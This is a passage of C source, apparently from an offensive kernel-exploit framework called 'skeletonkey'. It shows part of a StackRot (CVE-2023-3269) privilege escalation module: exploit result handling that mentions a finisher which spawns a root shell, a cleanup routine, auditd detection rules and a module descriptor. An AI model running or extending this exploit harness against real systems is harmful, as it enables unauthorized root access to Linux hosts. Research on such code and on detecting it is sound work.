stackrot: race child killed by signal %d " "(consistent with UAF firing under KASAN)\n", sig); fprintf(stderr, "[~] stackrot: empirical signal recorded; no cred\n" " overwrite primitive — NOT claiming EXPLOIT_OK.\n" " See /tmp/skeletonkey-stackrot.log + dmesg for witnesses.\n"); } return SKELETONKEY_EXPLOIT_FAIL; } if (!WIFEXITED(status)) { fprintf(stderr, "[-] stackrot: child terminated abnormally (status=0x%x)\n", status); return SKELETONKEY_EXPLOIT_FAIL; } int rc = WEXITSTATUS(status); if (rc == 22 || rc == 24) return SKELETONKEY_PRECOND_FAIL; if (rc == 23) return SKELETONKEY_EXPLOIT_FAIL; if (rc == 34) { /* Finisher reported root-pop success. The shared finisher * normally execve()s the root shell so we don't actually * reach this path unless --no-shell was set. */ if (!ctx->json) { fprintf(stderr, "[+] stackrot: --full-chain finisher reported " "EXPLOIT_OK (race won + write landed)\n"); } return SKELETONKEY_EXPLOIT_OK; } if (rc == 35) { /* Finisher ran but didn't land — by far the expected outcome * given the <1 % race-win rate. */ if (!ctx->json) { fprintf(stderr, "[~] stackrot: --full-chain finisher ran; race did not\n" " win + land within budget (this is the expected\n" " outcome — race-win reliability is <1%% per run).\n"); } return SKELETONKEY_EXPLOIT_FAIL; } if (rc != 30) { fprintf(stderr, "[-] stackrot: child failed at stage rc=%d\n", rc); return SKELETONKEY_EXPLOIT_FAIL; } if (!ctx->json) { fprintf(stderr, "[*] stackrot: race harness ran to completion.\n"); fprintf(stderr, "[~] stackrot: read/write/cred-overwrite primitives NOT\n" " implemented (per-kernel offsets; see module .c TODO\n" " blocks). 
Returning EXPLOIT_FAIL per verified-vs-claimed.\n"); } return SKELETONKEY_EXPLOIT_FAIL; } #endif /* __linux__ */ static skeletonkey_result_t stackrot_exploit(const struct skeletonkey_ctx *ctx) { #ifdef __linux__ return stackrot_exploit_linux(ctx); #else (void)ctx; fprintf(stderr, "[-] stackrot: Linux-only module; cannot run on this host\n"); return SKELETONKEY_PRECOND_FAIL; #endif } /* ---- Cleanup ----------------------------------------------------- */ static skeletonkey_result_t stackrot_cleanup(const struct skeletonkey_ctx *ctx) { if (!ctx->json) { fprintf(stderr, "[*] stackrot: cleaning up race-harness breadcrumb\n"); } if (unlink("/tmp/skeletonkey-stackrot.log") < 0 && errno != ENOENT) { /* harmless */ } /* The race harness's threads + msg queues live in the child * process which has already exited; nothing else to drain. */ return SKELETONKEY_OK; } /* ---- Detection rules --------------------------------------------- */ static const char stackrot_auditd[] = "# StackRot (CVE-2023-3269) — auditd detection rules\n" "# The trigger is mremap/munmap/mprotect bursts against MAP_GROWSDOWN\n" "# stacks, combined with unshare(CLONE_NEWUSER). 
Each individual call\n" "# is benign — flag the *combination* by correlating these keys with a\n" "# subsequent kernel oops or KASAN message in dmesg.\n" "-a always,exit -F arch=b64 -S unshare -k skeletonkey-stackrot-userns\n" "-a always,exit -F arch=b64 -S mremap -k skeletonkey-stackrot-mremap\n" "-a always,exit -F arch=b64 -S mprotect -k skeletonkey-stackrot-mprotect\n" "-a always,exit -F arch=b64 -S munmap -F success=1 -k skeletonkey-stackrot-munmap\n"; const struct skeletonkey_module stackrot_module = { .name = "stackrot", .cve = "CVE-2023-3269", .summary = "maple-tree VMA-split UAF (StackRot) → kernel R/W → cred overwrite", .family = "stackrot", .kernel_range = "6.1 ≤ K < 6.4-rc4, backports: 6.3.10 / 6.1.37 (LTS)", .detect = stackrot_detect, .exploit = stackrot_exploit, .mitigate = NULL, .cleanup = stackrot_cleanup, .detect_auditd = stackrot_auditd, .detect_sigma = NULL, .detect_yara = NULL, .detect_falco = NULL, }; void skeletonkey_register_stackrot(void) { skeletonkey_register(&stackrot_module); }